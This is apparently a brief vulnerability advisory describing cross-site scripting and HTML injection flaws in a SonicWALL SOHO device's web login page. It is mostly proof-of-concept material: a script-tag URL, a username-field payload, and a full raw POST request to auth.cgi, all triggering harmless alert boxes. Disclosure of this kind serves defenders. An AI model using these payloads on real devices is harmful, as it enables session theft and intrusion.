SonicWALL SOHO Web Interface Multiple Remote Input Validation Vulnerabilities

SonicWALL SOHO Web Interface Multiple Remote Input Validation Vulnerabilities

No exploit is required to leverage either of these issues. The following proof of concepts have been made available:

To leverage the cross-site scripting issue:
http://www.example.com/<script>alert("Its not magic... its a sonic")</script>

To leverage the HTML injection issue enter the following into the 'username' field of the login form:

</TD><script>alert("!")</script>

It is also possible to leverage the HTML injection issue by submitting the following POST request:

POST http://192.168.168.168:80/auth.cgi HTTP/1.0
Accept: */*
Referer: http://192.168.168.168/auth.html
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: BadGuy
Host: 192.168.168.168
Content-Length: 160
Pragma: no-cache uName=</TD><script>alert("Its_not_magic..._its_a_sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1